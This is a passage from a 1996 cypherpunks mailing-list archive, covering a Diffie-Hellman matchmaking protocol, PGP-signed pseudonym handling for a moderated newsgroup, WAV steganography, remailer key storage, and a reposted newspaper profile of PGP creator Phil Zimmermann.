Another description: Bob and Alice can have a date if they both commit
to each other. If only one commits, nobody will ever find out about it.

Below are the protocols I came up with. They all depend on the
Diffie-Hellman "common key" as derived in the DH key exchange.

- T is the trusted third party.
- hash_k() is a keyed hash function with key k.
- pseudo(Alice) is a pseudonym for Alice.
- n is a large prime.
- g is a primitive element mod n.
- A is Alice's secret exponent. Her public key would be g^A mod n.
- Alice's and Bob's "common key" would be g^(AB)mod n

----

1. The mediated off-line one:

- T selects a secret k (which he uses for the duration of a month,
  say).

- Alice is interested in Bob, so she calculates a=g^(AB)mod n and
  anonymously and securely sends it to T along with pseudo(Alice).

- T calculates c=hash_k(a) and broadcasts c and pseudo(A) to the
  planet or puts them on a bulletin board.

- Bob is ignorant of Alice's actions. If he ever decides that he
  likes her, he calculates and sends a=g^(AB)mod n to T (plus
  pseudo(Bob)). T will calculate hash_k(a) which equals c. T broadcasts
  c plus pseudo(B) so both Alice and Bob will know they have a match.
  If Bob is not actually interested in Alice, he doesn't perform this
  step at all, so nothing happens, and Alice just assumes Bob is not
  interested.

Replay is not an issue here.

2. The mediated on-line one:

- Alice is interested in Bob, so she calculates a=g^(AB)mod n and
  ANONYMOUSLY approaches Bob.

- Bob calculates b=g^(BX)mod n, where X may or may not be Alice.
  If Bob is not interested in anyone, he could tell Alice to leave,
  or select a random X while calculating b.

- Alice and Bob want to compare a and b. They generate a random k using
  some coin-flipping protocol. Then they send (possibly pseudonymously)
  hash_k(a) and hash_k(b) to T who compares them and announces the
  result.

Using a keyed hash function reduces the trust on T, compared to
protocol (1), I hope. Now, T has to conspire with one of the
parties to get the "common key". I suspect this can be improved
using the Digital Envelopes protocol as described by Fagin,
Naor and Winkler in "Comparing information without leaking it"
to replace the hashing.

3. Non-mediated on-line one: This third protocol would remove T in
(2). Alice and Bob would compare their "common keys" directly. The
problem here is fairness i.e. to ensure nobody finds the result
of the comparison first. If this was possible, people could
"probe" other people's interests and terminate the protocol
as soon as they find the answer (i.e. the result of the
"common key" comparison). I think ZK protocols would be of use
here. I am still working on this one.

----

Assume that in any of these protocols Alice calculates her "common key"
with X: a=g^(AX)mod n which means that she is interested in X. The
reason a must remain sercet is that if X learns it, he could calculate
all possible b(Y)=g^(YX)mod n until he finds a Y such that b(Y)=a,
in which case he will find out Alice is interested in him. Note
that X will not try all possible values for Y, but will use the
public keys of all the girls, instead.

I would appreciate any comments on these protocols and on the
use of DH "common key".

  Dimitris


-- 
Dimitris Tsapakidis               PGP keyID: 735590D5
dimitrt@dcs.rhbnc.ac.uk           MSc in Information Security,
This space reserved               Royal Holloway, University of London
for future use.                   Origin: Thessaloniki, Macedonia, Hellas




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Wed, 6 Mar 1996 22:08:39 +0800
To: cypherpunks@toad.com
Subject: "Political Life in Cyberspace" forum, NYC, 3/12/96
Message-ID: <v01530508ad6179945c4d@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


For those of you in the NYC area, I'm presenting a forum next week on
"Political Life in Cyberspace" (not my title).  I'm going to skip the
boring net-boosterism and talk mainly about several bleak scenarios I've
been thinking about for the past year or two: the imminent death of the
net, the impossibility of digital privacy, and various impending threats,
like government/corporate crackdowns on privacy, the disneyfication of the
net and conversion to a digital Home Shopping Network, Alta Vista and the
increase in dossiers, etc.  If I'm in a good mood, I may also talk about
how a very close friend of mine was fired for making "unflattering remarks"
about her employer on the cypherpunks list.

Here are the details:


                         Date: Tuesday, March 12
       Place: The Brecht Forum, 122 West 27 St., 10th Floor (NYC)
                             Time: 8:00 p.m.
                    Price: FREE (donation requested)

             ---------------------------------------------

                           An anarchist forum
                 presented by the Libertarian Book Club

--
Dave Mandl
dmandl@panix.com
http://www.wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 5 Mar 1996 21:42:23 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Mainstreaming PGP on Usenet
In-Reply-To: <3JJakD38w165w@bwalk.dm.com>
Message-ID: <199603050645.AAA14546@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Cc: cypherpunks@toad.com
Subject: Re: Mainstreaming PGP on Usenet

Dr. Dimitri Vulis wrote:
> 
> ichudov@algebra.com (Igor Chudov @ home) writes:
> > Dr. Dimitri Vulis wrote:
> > > One issue that hasn't been addressed by the s.c.r.m robomod is the
> > > possibility of persistent nyms: that is, Alice D. Nonymous somehow makes
> > > her public key known to the robomod; and later if someone submits an articl
> > > via some anon remailer claiming to be hers, it would be rejected if the
> > > signature doesn't check. Of course, her true submissions would be accepted
> > > from any remailer. How could such protocol be implemented?
> >
> > We see no problem with user posting under pseudonyms, as long as they do
> > not try to pretend to be other real people and do not constantly mutate,
> > and submit their messages to the robomoderator for consideration.
> 
> On the contrary, I was thinking of a situation when a person is posting through
> an anonymous remailer, yet wishes to establish a persistent nym that can't be
> impersonated. E.g., someone may submit articles via remailers (different every
> time) and have a signature 'Alice D. N.'; what's to prevent someone else from
> submitting an article and also signing it 'Alice D. N.'?
> 
> I was thinking of allowing the user to add a 'From: <nym>' in the first
> paragraph of the PGP-signed block. To establish the nym, Alice would first
> post her public key under the name of Alice; then she would post things like
> 
> From: remailer@somewhere
> 
> -- begin pgp signed msg
> 
> From: Alice
> 
> ...
> 
> This would also address the problem of someone's misconfigured system where
> his submissions appear to come from moron@camelot.ptu.edu or
> moron@pendragon.ptu.edu or some other random hostname.
> 

As far as I understand, the problem boils down to this:

   Nym users want to have an identity (belief of other users that
   a set of articles originating from many anonymous addresses were in
   fact written by one person). At the same time, we want to prevent
   users who do not have a permanent return address from using
   addresses of other persons.

One of the problems with allowing users to specify return addresses in
the letters is a possibility of forgery: what if
Mallory@evil-services.com posts a MAKE MONEY FAST message, and specifies
that her "From: " address should be Popugaev@get_high.edu? Such posting
could get Mr. Popugaev in trouble.

Maybe the following rewriting rule may be a good compromise between
functionality and security, for PGP signed messages:

1. Original "From: " address is rewritten as "X-Origin" or some such.

2. "From:" address is always set to the main user ID of the PGP key that
was in the signature.

3. For "Reply-To: " we use "Reply-To: ", if it is present, then we try
"From: ", and if "From: " is not present, "Reply-To: " is not set.

4. If "Subject: ", "Date: ", "Message-ID: ", or "Newsgroups: " is
present on the block of pseudo-headers starting with the first line of
the text, use them instead of trusting the headers of an email.

This way, we achieve the following results: 

1. Positive and reliable identification of users is possible to every
reader of soc.culture.russian.moderated, not only to moderators;

2. Users gain additional protection from man-in-the-middle attacks by
using well protected pseudo-headers withing PGP signed blocks; they
cannot misuse this feature by lying about who they are;

3. Those who do not want to bother do not have to;

4. People with misconfigured email addresses may have at least
some address field ("From: ") set correctly.

5. Nyms can post freely through any anon remailers and always have their
identity show up in the "From: " field, even if remailers do not allow
users to specify their identity at all.

Note that I agree that we need to have a database of MD5 checksums of all
submissions and carefully process duplicates.

What do you think?

	- Igor.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTvi6MJFmFyXKPzRAQGEMQP8C4V9gCs5REc5hez0gRP7bXn9NGV5S/6l
fxJo4SPmCBdWxn+msLxchbrho/hlhcUMaPuswcnacgrqEAyd1H4yIiMyZ1s6z06e
0q6WQ8QUy/E1nrc4lCSXKUBYB8MV/SGlynxxq3X9T2eF2lmnoArWj4QpfcVgk9RR
HvcvpK3GWuA=
=OXCv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 5 Mar 1996 17:43:28 +0800
To: Christopher Allen <ChristopherA@consensus.com>
Subject: Re: SEAL cipher info requested (something actually list related!)
In-Reply-To: <v03005102ad61925e3ec8@[157.22.240.12]>
Message-ID: <Pine.SUN.3.91.960305012339.25225A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Mar 1996, Christopher Allen wrote:

> At 4:27 PM 1/27/96, Anonymous wrote:
> >Anybody have info on the SEAL cipher?  I can't find any
> >descriptions or analysis of it.  Refs, proceedings or URLS
> >would be a good thing.
> 
> I also am interested in references to it.

I believe it was presented at the first Cambridge security workshop on 
fast software encryption.

Author:       Cambridge Security Workshop (1993).
Title:        Fast software encryption : Cambridge Security Workshop,
              Cambridge, U.K., December 9-11, 1993 : proceedings / Ross
              Anderson, (ed.).
Pub. Info.:   Berlin ; New York : Springer-Verlag, c1994.
Phy Descript: ix, 221 p. : ill. ; 24 cm.
Notes:        Includes bibliographical referenced and title.
LC Subject:   Computers -- Access-control -- Passwords -- Congresses.
Other Author: Anderson, Ross, 1956-.
Series Info.: Lecture notes in computer science ; 809.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Tue, 5 Mar 1996 16:21:53 +0800
To: cypherpunks@toad.com
Subject: Re: art-stego
Message-ID: <960305022451_438384532@emout05.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


.WAV files are potentially a good place to store stego information.  With a
16-bit file, as many as 8 of the least significant bits in each sample can be
replaced with encrypted info without making the file sound too wierd
(depending on the natural background noise of the recording).  If you make
one of those "waves on the beach" relaxation things, you might be able to get
away with even more.

Another thing--just a wild idea--test the randomness of encrypted data by
storing it in an 8-bit mono .WAV (your choice of sample rates) file and
listening to it.  Any correlations or patterns in the data should show up in
the playback as hums, clicks, squeals, or something.  It may even be possible
to determine the algorithm by the sound patterns--a sort of "audio
cryptanalysis."  Has anyone tried this?  Are there any .WAV stego programs
out there?

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@vishnu.alias.net>
Date: Tue, 5 Mar 1996 20:14:45 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: (Fwd) Gov't run anon servers
In-Reply-To: <199603041852.KAA01295@jobe.shell.portal.com>
Message-ID: <199603051202.GAA21522@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Hal" == Hal  <hfinney@shell.portal.com> writes:


    Hal> However, if I were a computer-savvy law enforcement agent,
    Hal> and I wanted to track messages through one of my remailers, I
    Hal> would try a technological approach.  I would first break the
    Hal> key for my remailer.  That is trivial.  The passphrase is in
    Hal> PLAINTEXT in the script file which runs the remailer!.  It
    Hal> has to be.  That is true of all automated remailers.  Anyone
    Hal> who can break into the remailer server and acquire root
    Hal> permission can find the remailer secret key.  My keys have
    Hal> been unchanged for three years.  Surely some enterprising
    Hal> hackers have stolen the keys by now.

Well actually... The passphrase in a mixmaster remailer is defined as
an environmental variable at compile time. The passphrase is not
stored in any cleartext fashion but is embedded in the
executable. Additionally the newer Ghio code (Matt's latest revision)
has the passphrase defined as an environmental variable in
remailer.c. Once remailer is compiled, you can delete the passphrase
from the code. I can't speak for the freedom or other remailers as I
haven't tried them. It's a little harder to get the key than just
looking for a cleartext file that contains it. That is, if the
remailer operator is being careful.

 John Perry - KG5RG - perry@vishnu.alias.net -  PGP-encrypted e-mail welcome!
 WWW - http://www.alias.net
 PGP 2.62 key for perry@vishnu.alias.net is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMTwtPqghiWHnUu4JAQGN6wf+NWPn++V/D1kFCp71kDLTe/pNA97n+21L
RLaOxWkq7+9K1zBIFHrzQYpJa9msud75gpNUq1s1LxzJAPY0BlCNIvqby9e7DMA/
aM6hhPUoQwljZ4SmE6ZmdFfPHz9ZchVclKUpepTv0melLEpc8Pv62eA9X1iFQMam
exIbObjYD1AFYp/6O5tAKh4m+mC0bmH64O4zkXLp9tbDKUPDjdkdN9lOMfjO1oFj
xJ+LCwtyA9YZxsD7GBklcd46ltiEQyrpV8PjwNJAvfIvPnplyfsvxBpg58zOF7t6
JGBj5DVk1Eyaw4sIMK6a9y/aDmkyVJVQVYozMigSS+UPKJsMCLQQFQ==
=qrrn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an366601@anon.penet.fi (** CRAM **)
Date: Wed, 6 Mar 1996 22:09:36 +0800
To: cypherpunks@toad.com
Subject: Phil Zimmermann, Cyber Rebel
Message-ID: <9603050701.AA04041@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



brought to you by CRAM

===cut=here===

Cyber Rebel
by Maureen Harrington
Denver Post Sunday Empire Section
March 3, 1996

Boulder -- On a frigid Thursday morning in January, attorney
Philip DuBois received a fax in his Boulder office from the
Justice Department telling him the criminal investigation of
his client, computer engineer Philip Zimmermann, had been
dropped. It had been a nerve-racking three years for
Zimmermann, his family, friends, and the high-powered legal
team that had been advising him. Hailed as a folk hero and
cybersaint, Zimmermann had become a cause celebre in the
computer world. But he was Public Enemy No. 1 in the
intelligence community. No one would say why the feeds had
dropped their case against him, but many speculated that the
government didn't want to make Zimmermann the first digital
martyr.

Zimmermann's crime? In the early summer of 1991, he gave
away software he designed to scramble, or encrypt, computer
e-mail messages. It was intended to circumvent a critical
shortcoming of the Internet. Since its inception, the
international computer network had been a virtual sieve that
could be siphoned by anyone with a modem. Encryption had
always been a concern of the military and diplomatic corps,
but with the advent of the Internet, protecting information
became a commercial concern. Industry and individuals were
having enormous problems keeping their communications
private.

Zimmermann's software, going by the aw-shucks name of Pretty
Good Privacy, or PGP, solved that problem. He gave the
formula to a friend, who put it out on the Internet, making
it possible for an ordinary citizen to have a private
conversation on-line.

PGP sounds innocent enough. It's sort of an electronic
envelop to protect computer messages. Based on a
mathematical formula, it uses two "keys"--one private, used
only by the individual, and one public, given to anyone.
Each user has a unique set of keys and a digital "signature"
ensuring the reader that the people generating the messages
are really who they say they are.

Zimmermann intended his program to give individuals "the
right to be let alone," as Justice Louis D. Brandeis called
the privilege of privacy. But, his act has had an enormous
impact on the government, computer culture, and the
individuals who use and misuse the technology. Phil
Zimmermann's name may go down in cyberspace history--
whether as a hero or a villain.

PGP made Zimmermann's name a rallying cry for people who
don't want the government reading their e-mail-- and odd
coalition of civil libertarians, the Christian right and
computer professionals. But it also set off a firestorm in
the nation's house of spooks, the National Security Agency,
and lighted a fire under the FBI. Computer crime specialist
William Spernow predicts that criminals will be routinely
encrypting information within two years, making criminal
investigations doubly hard. As far as the surveillance
community was concerned, Zimmermann was the Antichrist,
making it possible for terrorists, pedophiles and drug lords
to flourish behind a shield for messages the super-computers
of the NSA couldn't crack.

Zimmermann acknowledges that his handiwork might be used for
criminal purposes. But the fuel of his motivation was moral
outrage at a government that may spy on its citizens. By
giving away PGP, the designer felt he could strike a pre-
emptive blow before the government made encryption illegal.
As it turns out, he made his move just in time.


Zimmermann, whether a folk hero or an aider and abettor of
criminals, is a man no one would pick out as a cyberspace
guerrilla.

John Perry Barlow, one of the founders of Electronic Freedom
Foundation, an influential cyberspace civil rights group,
describes him as "an apparently unformidable gnome on a
tight budget (who) now terrifies a security monolith which
required half a century, uncounted billions of dollars and
the collective IQs of a few thousand geniuses to develop."

Zimmermann didn't come out of one of the powerhouses of
academia. He went to Florida Atlantic University, where he
admits that his original major, physics, "was to hard. The
calculus got me."  He's definitely the odd man out with just
an undergraduate degree in a field crawling with Ph.D.s.  He
never joined one of the prestigious think tanks or labs on
the coasts. He's been in Boulder for nearly 20 years, on his
own, without benefit of grants. The Massachusetts Institute
of Technology distributes PGP and published "The Official
PGP Users Guide," but Zimmermann isn't one of their own.

Steve Welch, who's known Zimmermann since college and later
went into a boutique computer business with him that went
bust in the `80's, said, "I met Phil one night about 2 a.m.
in the computer room at college. He knew nothing about
computers. He'd just come over from the physics department.
Within one week, he was a better programmer than I was."

Zimmermann suffered the loneliness of many smartest-in-the-
class kids, along with the pain of a bleak childhood with
alcoholic parents. "We moved a lot. I went to a lot of
schools, and I think I got interested in cryptology then. I
played around with it myself."

"I thought I was a smart guy, figuring out codes, until I
read enough in the field to see how bad I really was," he
said, looking back from the safe distance of success.
Zimmermann claims he isn't humble, but he is quick to point
out, "I'm not the best cryptographer in the would. I figured
that out pretty quickly. But I'm probably the most famous."
He is powerful because of the fame. But he's more than a
little skittish about that.

"I think I've been effective with very few resources, so I'd
like to see what I could do with a company where I could
afford to have people working full time. But it's the power
structure I've been questioning most of my life, so I'm wary
of it... being seduced by it."


Watergate was the incubator of Zimmermann's political
awareness.

"I began to question a lot of things that government does
during that time. I worked for a year on a rape crisis
center line and I think... in some ways, I became more of a
humanist."

Graduating with a degree in computer science, Zimmermann and
his wife moved at the urging of friends to Boulder in 1978.
It was in that politically volatile environment that
Zimmermann became aware of the threat of nuclear
proliferation.

"In the early `80s we were ready to relocate to New
Zealand," he recalled. "We'd had our first child. I began to
think about the future and the threats to that future. We
had our visas and work papers all ready when we attended a
conference on the nuclear threat, in Denver." It was a
speech by Daniel Ellsberg that changed the Zimmermanns'
minds. "We decided to stay and fight," he said.

And fight he did. He began as any techno-wonk would, by
learning everything he could about the issues. Zimmermann
read military strategy and listened to the thinkers in the
opposition. He felt that too often the left refused to know
anything about those who disagree with them

"That makes you weak," he said.

The left was technophobic, as well. It became clear to
Zimmermann that the right had some real firepower. The
republicans had made very good use of computers in the 1984
campaign. To prevail, the newly minted activist realized
that the movement had to use everything in its power. And
that included computers.

Chet Tchozewski doesn't see as much of Phil as he did during
the `80s when both men were immersed in the nuclear freeze
community in Boulder, but he has watched Zimmermann's career
with interest and pride.

"Phil was invaluable to us," said Tchozewski. "Not only as a
speaker, at which he was very good, but because of his
technical knowledge and his remarkable intellectual
capacities. He asked very tough questions. He started a
study group and then he contributed his technical
expertise."

Tchozewski, now running the Boulder-based Global Green
Grants Fund, says that Zimmermann was arrested twice at anti-
nuclear demonstrations, but he thinks Zimmermann has been
more sorely tested in recent years.

"The first thing you see in Phil is his brightness, but it's
his integrity that is even more striking to me. Imagine the
courage it took not to cave in to the government. Imagine
what it took for this guy to give away PGP-- to walk away
from money-- what most people consider success. He took the
risk for something he believed in. He could work for big
industry or the government, but he doesn't."

"Phil may be gifted in computers, but clearly he's thought
deeply about civil disobedience and is influenced by Gandhi
and Thoreau, as well as by science."

Zimmermann did take the risk. He had begun thinking about
encryption after realizing that the government was breaking
into radical organizations.

"Mostly they were taking floppy disks with membership
information. It didn't take much to know we needed to keep
our communications secret. So I began to read the scholarly
papers on the subject and knew that some of the original
problems of encryption had been solved in the `70's by two
scholars at Stanford. I began to work on the problems."

One of the people Zimmermann contacted for help was Charlie
Merritt, a cryptographer in Arkansas. Merritt and his wife,
Hobbit, had made their own encryption program years earlier.

"We were selling encryption software abroad-- there wasn't
much use for it in the U.S. then, but a lot of foreign
customers were interested," said Merritt. "The NSA shut us
down. Pretty near ruined us. I'd been holding a grudge for
years, when Zimmermann called me. I was happy to help."

For two years, Zimmermann and Merritt talked on the phone.
Eventually Merritt spent a week in Boulder and showed
Zimmermann how to run the enormous series of numbers
necessary to create PGP. They continued to talk on the phone
until the program was nearly completed.

Hobbit Merritt added, "I think that the success of PGP is
due in part to the growing anti-government feeling in the
country. There are so many people-- conservative, liberal,
all kinds-- who have an uneasy feeling about the
government."

By 1990 Zimmermann had most of the pieces for PGP, but he
hadn't put it together. So he bit the bullet, taking on very
little consulting business and working seven 12-hour days a
week on the encryption program. It took him six months and
he missed five mortgage payments during that time. "I'm
pathologically optimistic," he said. "I had no idea it would
take that long."

In the middle of the process the government proposed Senate
Bill 266, which would essentially outlaw all private
encryption. Zimmermann knew then that he was in a  race with
the government. He beat them. In the summer of 1991, PGP was
posted on the Internet. He didn't post it himself, since "I
didn't know anything about the Internet, then. I barely knew
how to get e-mail."

The legislation has not become law, but the government is
still working on encryption standards. However, the battle
may have been lost-- partly because of Zimmermann. He
estimate there are 1 million users of PGP worldwide.

Early in 1993, Zimmermann got a call from U.S. customs
agents in San Jose, Calif. He thought they were asking for
his help. When he realized they were investigating him,
Zimmermann hired Phil DuBois, a criminal defense lawyer with
high-tech expertise practicing in Boulder. DuBois made an
unusual decision: He let Zimmermann talk to the agents.
"Usually I don't allow my clients to talk to law enforcement
agents. It's not to their benefit, since they've already
decided that my client is guilty. But Phil is so clearly not
a criminal that I let him talk with them."

The investigation intensified and it became clear to DuBois
and his client that they were investigating with the intent
to prosecute. It was then that Zimmermann put together a
team of lawyers across the country who worked on the case
pro bono.

"Phil has a genius for pulling really talented people around
him," DuBois said. "Most of us worked on this case because
we're concerned about the rights to privacy being violated,
but it's also an exciting legal case."

DuBois estimates that the bill would have been in the low-
to mid-six figures if everyone had charged for their work.
There is a legal defense fund for Zimmermann that, according
to DuBois, has brought in $1 contributions as well as a
$10,000 anonymous donation. It has reached the mid-five-
figure range.


Stewart A. Baker, chief counsel for the NSA, has written
about PGP in Wired magazine, the bible of the digitally
inclined. In his view, the fight for private Internet
communication has its dark side.

"Rather than rely on laws to protect us, (supporters of PGP)
say let's make wiretapping impossible. ... This sort of
reasoning is the long-delayed revenge of people who couldn't
go to Woodstock because they had too much trig homework. ...
Some argue that widespread availability (of PGP) will help
Latvian freedom fighters today (but) one of the earliest
users of PGP was a high-tech pedophile."

Zimmermann acknowledges the possible ugly uses of his
program.

"I've spent some sleepless nights worrying about what this
could be used for. I know that some evil is done, but I
believe that there is a greater good served here-- the right
to privacy."

"Law enforcement says that they need to be able to read
computer messages, just as they tap phones. However, they
have to have more ways to investigate than just tapping.
Criminals leave their footprints in the real world."

"I'm sickened by some of the people using this, but I have
to remember the Burmese freedom fighters using it to survive
and the scientists doing important work that needs to be
kept safe."

In a worst-case scenario of the investigation, the 42-year-
old software designer, husband and father of two would have
faced up to five years in prison and been forced to pay $1
million in fines.

Zimmermann was accused of breaking export laws-- of sending
across international borders what the G-men considered the
same as munitions or nuclear secrets. Zimmermann was seen by
his government as an intellectual gun-runner and threat to
western civilization. Jim Kallstrom, the FBI agent who has
been in charge of computer crime, has said about PGP, "Do we
want a digital superhighway... where major criminals can
operate impervious to the legal process?"

By setting PGP loose on the Internet, Zimmermann was accused
of sending his program across borders with[out] a license.
Of course, the law enforcement community was talking about
geographic borders. Defining cyberspace borders is far
trickier, let alone figuring out how to police them. That
would be the legal sticking point as the investigation
progressed.

The very right to privacy that Zimmermann had sought to
protect is akin to the privilege that President Clinton
invoked when he sought to keep his conversations with his
attorney private during the Whitewater investigations.
Ironically, it is the Clinton administration that has been
giving Zimmermann trouble.


It all began with the Clipper Chip.

Clipper is the technology offered by the government,
designed by the NSA, to encrypt messages, but with a "back
door" through which the government can gain access to read
the coded messages. Individuals and businesses that use the
Clipper would give the government a "key" to their encrypted
messages, allowing law enforcement the same right they have
now to tap phones. The government insists that any business
doing work for them use the Clipper, effectively forcing
them to allow the feds access to their communications.

Zimmermann is one of thousands of computer technocrats who
find that idea ludicrous. And dangerous: "If we let the
government go on in that blind way, we'll have a
surveillance society. And a watched society is a conformist
society. We will have totalitarianism if we don't guard
against it."

As Barlow put it, allowing the government to monitor your
computer communications is like "having a peeping Tom
install your window blinds."

Thousands of computer professionals have signed letters and
petitions decrying the use of Clipper. With Vice President
Al Gore's enthusiasm for the information highway and so many
allies in the computer business, the industry was taken by
surprise when Gore and the administration supported the
Clipper Chip. But then along came PGP. Within hours of
posting PGP on the Internet, the code was sent all over the
world, for anyone's use. That's what upsets the U.S.
government, in particular the NSA.

The super-secret intelligence arm of the U.S. government,
the NSA spends nearly $1 million an hour, $8 billion a year,
on around-the-world eavesdropping. They monitor computers,
phone lines, faxes, and telexes. With the defrosting of the
Cold War, NSA has had to rethink its priorities. Who was it
supposed to be listening to? On top of that was the
frustration of a whole new generation of eavesdropping-proof
technologies such as fiber-optic cable and the pesky PGP.
Zimmermann's stonewalling software was one problem too many.

NSA staffer Clint Brooks used to speak alongside Zimmermann
at privacy convention panels, but the agency now has gone
silent on PGP. According to a spokeswoman, "The agency does
not wish to comment on Mr. Zimmermann's personality,
business or other endeavors. We make no comments about
private encryption. We have nothing to say about the
investigation of Mr. Zimmermann."

At a conference on privacy at CU-Boulder in 1994, Dorothy
Denning, a proponent of the Clipper and chair of computer
sciences at Georgetown University in Washington, D.C.,
defended the chip. She told the crowd that the government
requests fewer than 1,000 wiretaps a year and the Clipper
"wouldn't make it any easier to tap phones, let alone
computer networks."

Denning insists that if the government had no key to
encrypted information too many criminals and terrorists
would find their work easier.

Marc Rotenberg, an expert on privacy and a lawyer for the
Electronic Privacy Information Center, or EPIC, sees
Zimmermann in quite a different light: "It's significant
that one person who sticks by his principles can make the
U.S. government back down. That doesn't happen every day.
The decision (to discontinue the investigation) doesn't
(establish a judicial precedent)... but it may mean the
government will be more careful in considering future
prosecutions."

Rottenberg says the Zimmermann case has forced the public to
raise questions about the role of the NSA in regulating
encryption, and "perhaps he has helped our government take a
look at outdated laws that were drawn up in the Cold Ware
era. Society is changing. Because of the Internet,
encryption is needed not just for the military, but also by
commercial interests as well as individuals. Phil
Zimmermann's actions and stand will affect policy, in my
opinion."

On the other side of the coin, Kallstrom, the FBI agent who
has been involved in the Zimmermann case, sees him as
helping criminals do their worst. However, Kallstrom added,
"Phil Zimmermann is very charming and well-intentioned. If
he would work for government wages we'd be happy to have
him."


Several days after leaning that the federal government was
dropping its investigation, Zimmermann is having a helluva
day. It's his 42nd birthday. He's leaving for Iceland
tomorrow, then on to Monte Carlo with a final stopover in
Paris.

"Only I would go to Iceland in February," he says on this
Monday morning. He'll be speaking on privacy and seeing
bankers, venture capitalists and other cryptologists.

He'd like to squeeze in the Louvre. He's never been to
Paris. He's taking his wife, Casey. She stood by him through
some tough years, waiting to see if he was going to be
spending time in prison, with no idea of what the future
held.

Zimmermann's future is finally here, now that the feds have
thrown in the towel and he's free to get on with his life.
And he's not missing one nanosecond of his 15 minutes.

There was a party in his honor the previous Saturday night.
He's been up since 9 a.m. having his picture taken,
something he's done an average of once a week for two years
since his case hit the media. Venture capitalists from
Atlanta, a genial father-and-son duo, flew in for a brief
dinner with him on Sunday night and 20 minutes of his time
Monday morning. They came bearing a gift: a black glove-
leather motorcycle jacket with a Harley Davidson logo. The
gift must have set them back $500. There's millions more
dollars where that came from, and they'd like to give some
to Zimmermann to help fund his new business.

The new company is going to make PGP look like small
potatoes, according to Zimmermann. He says he has developed
an encryption program for telephones. This software
application will make phone tapping virtually impossible.

"It'll have the government going ballistic," crows
Zimmermann. The uses are unlimited, especially if it's
inexpensive, impenetrable and easy to use. So far, the test
model has fulfilled all those criteria. The word is out and
entrepreneurs are coming out of the woodwork.

Zimmermann's pace has accelerated. He can hardly answer his
e-mail and admits that every once in a while when the voice
mail is out of hand he just dumps it all and assumes anyone
with something important to say will call back. On his phone
answering tape, he patiently explains that he can't help
everyone who calls him for help with PGP.

He's tired of "the guys who think they see black
helicopters, but I have had some extraordinary conversations
with people using PGP." He may have to take his `60s vintage
Volkswagen bus to the shop to be fixed. He used to fix it
himself.

Even though his schedule has gone into warp speed,
Zimmermann is finding the time to do a few things for
himself. A little absent-minded, perennially rumpled, with
curly hair and beard, he's decided to throw of the sartorial
schackles and become "Phil Zimmermann: Bad Boy
Cryptologist." He laughs, but he's not kidding. He loves
that motorcycle jacket.

"After all this attention and tension," he says, "I just
want to do some things for fun. I've been wearing a suit and
being careful of what I say and how I appear because of this
investigation. Now it's time for some other things."

Ever since the feds dropped their investigation Jan. 11,
he's been spending time in fancy hotels in Silicon Valley,
listening to CEOs woo him and consulting with the behemoths
of technology.

"It's a lot of fun," he says, a bit incredulous. "Guys who
have run huge companies want to talk to me."

Zimmermann may have become familiar with the toys and
terrain of the Silicon Valley potentates and he may miss the
Louvre if the French bankers demand all his attention, but
Saturday night was like old times.

His wife threw a "Phil Got Off the Hook Party" at the Rocky
Mountain Peace Center, a funky meeting hall for lefties.

It was a gathering of peacenik friends from his nuclear
protest days, family and lawyers. Guys with shoulder-length
hair scarfed potluck casseroles and talked gigabytes. It
ended early. The kids had to get up to bed. Phil cleaned up,
recycling the trash, and carefully bagging the leftovers.


(Mareen Harrington is the staff writer for Empire Magazine)


Sidebar: PGP was huge leap forward for cryptography

Historically cryptology has been the realm of spies. It was
the veil drawn over military secrets and diplomatic pouches.
The cracking of the super-secret Nazi code Enigma by the
Allies helped win the Second World War.

With the invention of cyberspace, the need to identify
message senders and to send messages so that others cannot
read them has become a necessity in business and personal
lives. The shift was created by the computer, fax, and phone
communications. It has become increasingly obvious that
almost anyone can listen to or read information from these
sources.

Two-key cryptography, one of the most important advances in
the field and which made PGP possible, was discovered by
Whitfield Diffie and Martin Hellman, professors at Stanford
University. In this system every user has two keys. The
first is a public one, given out to correspondents. The
second is a private one, kept by the individual. Before,
there had been a third party, a key manager, who kept the
keys. In two-key cryptography there is no their party to be
trusted.

After Diffie and Hellman published their findings in 1976,
three MIT mathematicians developed a system to put two-key
cryptography into practice. Their company is called RSA.

Philip Zimmermann came along in the 1980s, took the
information others had developed and created PGP.

Using the software's public key, one individual can send a
scrambled message with his digital signature to another.
That person will use his private key to unscramble the
message. As Diffie and Hellman predicted, there is no need
for a trusted third party.

Zimmermann has published his code system in book form so
that it can be examined by anyone. Despite that publication,
no one has been able to break the code, since it is longer
and more complicated than even the most sophisticated of the
known government encryption formulas. Because no one has
been able to break the code, users of PGP know that it is
trustworthy-- so far.



 \   \   \   \   \   \   \   \   \   |   /   /   /   /   /   /   /   /   /   /
          _______       ________          _____        _____  _____
         ///   \\\      |||   \\\        /// \\\       |||\\\///|||
        |||     ~~      |||   ///       |||   |||      ||| \\// |||
        |||     __      |||~~~\\\       |||~~~|||      |||  ~~  |||
         \\\   ///      |||    \\\      |||   |||      |||      |||
          ~~~~~~~       ~~~     ~~~     ~~~   ~~~      ~~~      ~~~
